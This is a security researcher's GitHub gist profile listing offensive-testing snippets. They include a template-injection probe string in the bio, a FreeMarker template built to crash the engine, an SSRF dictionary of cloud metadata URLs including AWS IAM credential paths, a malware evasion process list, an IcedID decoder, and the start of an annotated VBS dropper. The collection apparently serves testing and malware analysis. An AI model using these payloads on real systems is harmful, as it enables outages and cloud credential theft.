Skip to content

Instantly share code, notes, and snippets.

View Plazmaz's full-sized avatar
👀
’<!--${7*7}<#--{#{{!--#}#{7*7}${{7*7}}-->{{__proto__}}--}}{{this}}#set($x=7*7)$x

Dylan Katz Plazmaz

👀
’<!--${7*7}<#--{#{{!--#}#{7*7}${{7*7}}-->{{__proto__}}--}}{{this}}#set($x=7*7)$x
228 followers · 30 following
View GitHub Profile
@Plazmaz
Plazmaz / gen-bitbucket-credentials.sh
Created November 7, 2017 16:59
Generate test credentials for bitbucket
#!/bin/bash
CLIENT_ID=""
CLIENT_SECRET=""
if [[ ! $1 ]]
then
echo "Please visit the following url to generate a code:"
echo "https://bitbucket.org/site/oauth2/authorize?client_id=$CLIENT_ID&response_type=code"
else
curl -X POST -u "$CLIENT_ID:$CLIENT_SECRET" \
@Plazmaz
Plazmaz / keybase.md
Created November 24, 2017 15:01

Keybase proof

I hereby claim:

  • I am plazmaz on github.
  • I am plazmaz (https://keybase.io/plazmaz) on keybase.
  • I have a public key ASBxr7rAPgnm0QPh7SAuvPdZSIcoiHtF9wGH3uNplRZtDwo

To claim this, I am signing this object:

@Plazmaz
Plazmaz / freemarker-billion.ftl
Last active November 20, 2019 20:37
FreeMarker Billion Laughs
<#-- This will crash Freemarker when used as a template -->
<#assign x=[r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>", r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>"]/>
<#list x as y>
<#assign x2=y?interpret/>
<@x2/>
</#list>
@Plazmaz
Plazmaz / cloud_metadata.txt
Last active July 14, 2018 21:57 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@Plazmaz
Plazmaz / arya-list.md
Last active May 30, 2019 16:24
Arya Stark's Kill List (From the Show)

Spoilers?

  • Joffrey
  • Cersei
  • Wolder Frey
  • Meryn Trant
  • Tywin Lannister
  • The Red Woman
  • Beric Dondarrion (Removed before death)
  • Thoros of Myr
  • Ilyn Payne
@Plazmaz
Plazmaz / 2019-05-06-example-post.md
Last active June 25, 2019 16:16
Jekyll Metadata Generator

This Is a Post Title!

This is an example post. I really like this post because it is fake and that's cool.

@Plazmaz
Plazmaz / keybase.md
Created August 5, 2019 20:21

Keybase proof

I hereby claim:

  • I am plazmaz on github.
  • I am plazmaz (https://keybase.io/plazmaz) on keybase.
  • I have a public key ASDCStXBaUDQPBh36YOQRg_OttfvktUvoBPSi09wFgUwtgo

To claim this, I am signing this object:

@Plazmaz
Plazmaz / list.txt
Created September 29, 2019 18:44
A list of debugging/AV/developer tools extracted from malware
cis.exe
cmdvirth.exe
alive.exe
filewatcherservice.exe
ngvmsvc.exe
sandboxierpcss.exe
analyzer.exe
fortitracer.exe
nsverctl.exe
sbiectrl.exe
@Plazmaz
Plazmaz / decode.vbs
Last active December 18, 2022 23:14
A tool for decoding IcedID arrays
' Usage: cscript decode.vbs <array>
' Example:
' cscript decode.vbs "Array(g6,u7,s8,d4,z3,u7,b6,l5,j4,e9,k7,z1,k7)"
' returns qMUuDMFaZ.txt
conST r2=27
CONsT rr2=38
coNSt C5=42
cOnST D4=130
ConST t=132
coNst g2=146
@Plazmaz
Plazmaz / annotated-vbs-dropper.vbs
Last active January 2, 2021 09:37
Annotate/formatted VBS malware dropper. Don't execute this unless you know what you're doing (duh!)
' If these checks fail, this dropper will die in a recursive loop
' Checks if files exist in tmp
SKXSwgvzc
' Checks RAM >= 1024
uOCNREVZV
' Checks for debuggers, AVs, dev tools, and sniffing tools. Fails if any are present.
MHtrCHZpL
' Checks CPU cores >= 3
XWKtvlOt
' Checks disk space >= 60 GB